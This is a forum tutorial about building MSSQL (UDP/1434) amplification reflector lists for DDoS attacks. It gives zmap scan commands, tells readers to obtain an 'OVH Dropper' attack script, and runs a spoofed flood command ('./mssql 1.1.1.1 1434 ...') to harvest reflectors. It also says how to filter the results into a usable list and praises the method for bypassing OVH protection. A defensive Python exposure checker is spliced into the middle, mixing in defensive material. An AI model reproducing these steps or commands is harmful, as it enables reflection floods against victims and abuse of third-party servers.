www.i4info.org

How to scan MSSQL amplified
Post by Admin on Fri Jan 02, 2015 9:51 pm

What you need:
100Mbps/1Gbps dedicated server or XEN/KVM VPS (OpenVZ VPSs won't work).
OVH Dropper attack script: You can either buy it or find the public version. Ask a few people.
You will also need a spoofable server.
mssql_1434.pkt (the zmap probe file; the download link in the original post is only visible to registered, logged-in members).
CentOS 6/7

Note* This method works very well and is very fast, but it's not the easiest. MSSQL only has a 10x amplification factor, which makes it a poor amplification method overall, but it works well against protected servers such as OVH: the filter does not catch it and passes the traffic as legitimate, so the port still gets flooded.
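Where that amplification comes from, and how an administrator can check whether their own SQL Server is exposed: the SQL Server Browser service on UDP/1434 answers a one-byte CLNT_UCAST_EX request (0x03) with an SVR_RESP message listing every instance, so a single byte sent draws a reply of a few hundred bytes. The script below is an added example written for this page, not the original post's tooling and not the contents of mssql_1434.pkt; the message layout follows Microsoft's MS-SQLR specification, and the sample response, host name and instance names in it are constructed for illustration. Point probe_ssrp() only at a server you are responsible for; if it answers from the internet, the fix is to firewall UDP/1434 or stop the SQL Server Browser service.

```python
"""SSRP (SQL Server Browser, UDP/1434) exposure check.

Added example for this page, not the original post's tooling.  Message
formats follow MS-SQLR: CLNT_UCAST_EX (0x03) and SVR_RESP (0x05).
All sample data below is constructed, not captured from a real server.
"""
import socket
import sys
from typing import Dict, List, Optional

SSRP_PORT = 1434
CLNT_UCAST_EX = b"\x03"   # one byte: "list all instances"
SVR_RESP = 0x05
IPV4_UDP_HEADERS = 28     # 20-byte IPv4 + 8-byte UDP header, for on-the-wire ratios


def build_probe() -> bytes:
    """The request the Browser service answers without any authentication."""
    return CLNT_UCAST_EX


def parse_svr_resp(data: bytes) -> List[Dict[str, str]]:
    """Parse SVR_RESP: 0x05, little-endian uint16 length, then ASCII
    key;value pairs, one instance per ';;'-terminated group."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    length = int.from_bytes(data[1:3], "little")
    body = data[3:3 + length].decode("ascii", errors="replace")
    instances = []
    for group in body.split(";;"):
        fields = group.split(";")
        if len(fields) < 2:
            continue            # trailing empty group after the last ';;'
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def payload_amplification(request: bytes, response: bytes) -> float:
    """Bytes returned per byte sent, UDP payload only."""
    return len(response) / len(request)


def wire_amplification(request: bytes, response: bytes,
                       headers: int = IPV4_UDP_HEADERS) -> float:
    """Same ratio counting IP+UDP headers on both packets.  This is the
    figure that matters for link saturation, and for a 1-byte request it
    is far lower than the payload ratio."""
    return (len(response) + headers) / (len(request) + headers)


def probe_ssrp(host: str, timeout: float = 2.0) -> Optional[bytes]:
    """Send one CLNT_UCAST_EX to host:1434 and return the raw reply, or
    None if nothing came back.  Only use against hosts you are responsible for."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_probe(), (host, SSRP_PORT))
        try:
            data, _ = sock.recvfrom(4096)
        except socket.timeout:
            return None
    return data


def _svr_resp(body: str) -> bytes:
    """Frame a response body the way the Browser service does (used for the sample)."""
    raw = body.encode("ascii")
    return bytes([SVR_RESP]) + len(raw).to_bytes(2, "little") + raw


# Constructed sample: two instances on a host named SQLHOST01 (not real data).
SAMPLE_RESPONSE = _svr_resp(
    "ServerName;SQLHOST01;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;11.0.2100.60;tcp;1433;;"
    "ServerName;SQLHOST01;InstanceName;REPORTING;IsClustered;No;"
    "Version;11.0.2100.60;tcp;49152;;"
)


def report(host: str, response: Optional[bytes]) -> str:
    """Human-readable verdict for one probe."""
    if response is None:
        return f"{host}: no SSRP reply on UDP/{SSRP_PORT} (not exposed or filtered)"
    insts = parse_svr_resp(response)
    names = ", ".join(i.get("InstanceName", "?") for i in insts)
    return (f"{host}: EXPOSED - {len(insts)} instance(s) [{names}], "
            f"{len(response)} bytes back for {len(build_probe())} sent: "
            f"{payload_amplification(build_probe(), response):.0f}x payload, "
            f"{wire_amplification(build_probe(), response):.1f}x on the wire")


if __name__ == "__main__":
    # Usage: python ssrp_check.py <host>; with no host, report on the constructed sample.
    if len(sys.argv) > 1:
        print(report(sys.argv[1], probe_ssrp(sys.argv[1])))
    else:
        print(report("sample", SAMPLE_RESPONSE))
```

The on-the-wire ratio is the one to compare with the post's "10x": a 1-byte payload rides in a 29-byte IPv4/UDP datagram, so a 186-byte reply comes out near 7x on the wire even though it is 186x in payload terms.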



How to create MSSQL amplification lists



- Update your server.



Code:
yum -y update


- Install dependencies. zmap and gengetopt come from EPEL on CentOS, so enable it first. build-essential, libgmp3-dev and libpcap-dev are Debian package names that yum does not know; the CentOS equivalents are gcc, gmp-devel and libpcap-devel.



Code:
yum -y install epel-release
yum -y install zmap php python perl make gcc cmake gmp-devel libpcap-devel gengetopt byacc flex


- Download mssql_1434.pkt and place it in /root.

- Run the zmap command.



Code:
zmap -p 1434 -M udp --probe-args=file:/root/mssql_1434.pkt -o mssql_1434.txt


Note* The scan takes about 2 hours on a 1Gbps server. Wait until it has completely finished scanning.

- Upload the mssql_1434.txt list to a spoof-enabled server

- Connect to your spoof-enabled server and install the dependencies.



Code:
yum -y install iptraf


- Run iptraf.



Code:
iptraf


- Enable logging in iptraf.



Code:
Configure > Logging (Push enter)


[Image: ywTJFIQ.png]

- Create a UDP filter in iptraf.



Code:
Filters > IP > Define new filter > Name: MSSQL > CTRL-A


[Image: sQxHbBh.png]

- Apply the filter.
- Exit the menu.
- Select "IP traffic monitor".

- Select eth0/eth1 or the lowest interface on the list.
[Image: 6b6WdWs.png]

- Select the location in which the log file will be stored.
[Image: 7FClobf.png]

- Open another PuTTY session on your spoofable server.

- Use the MSSQL/OVH dropper attack script and attack your own server using the mssql_1434.txt you made earlier.
Note* Replace 1.1.1.1 with your spoofable server's IP.


Code:
./mssql 1.1.1.1 1434 mssql_1434.txt 1 2600


- In iptraf you should see a bunch of IPs incoming.

- Once the attack is over close iptraf.



Code:
Ctrl-X


- Change to the directory where your iptraf log file is stored.
Note* Replace /root with whatever directory it is stored in.


Code:
cd /root


- Keep only the responses larger than 199 bytes and store them in 200bytes.txt. iptraf logs the packet size as the 8th whitespace-separated field, which is what the awk test reads. Replace dongs.txt with the name of your iptraf log file.


Code:
awk '$8 > 199' dongs.txt > 200bytes.txt


- Extract just the IP addresses into 200bytesips.txt.


Code:
grep -Eo "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" 200bytes.txt > 200bytesips.txt


- Remove duplicates and randomly sort. Use sort -u here, not uniq -u: uniq -u prints only lines that occur exactly once, so it throws away every IP that replied more than once, which is the opposite of deduplication.



Code:
sort -u 200bytesips.txt > 200bytescleaned.txt; sort --random-sort 200bytescleaned.txt > done.txt


Done! Enjoy your list.


More information:
- If you need help, post below.
- A 200-byte cutoff seems to work best and last the longest, but experiment with it.
- Server freezing? Limit the zmap send rate with:

Code:
--bandwidth=10M

Add it after the -p 1434 option. zmap's --bandwidth (-B) takes a rate in bits per second with a K, M or G suffix, so 10M is 10 Mbps, not 100 Mbps. Change it as you like.

Please leave a thanks if you enjoyed this tutorial.

This is for educational purposes only.
